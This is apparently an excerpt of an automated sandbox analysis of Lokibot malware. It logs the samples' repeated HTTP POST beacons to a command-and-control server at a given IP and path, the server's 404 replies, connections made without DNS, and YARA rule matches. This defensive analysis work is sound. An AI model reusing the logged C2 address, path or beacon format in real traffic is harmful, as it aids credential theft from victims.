                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 12_2_00404ED4 recv,12_2_00404ED4
                      Source: unknownHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 180Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:54:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:54:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: FVR-N2411-07396.exe, 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, ZeJFfrYmOnJKS.exe, 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: ZeJFfrYmOnJKS.exe, ZeJFfrYmOnJKS.exe, 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/

                      System Summary

                      barindex
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
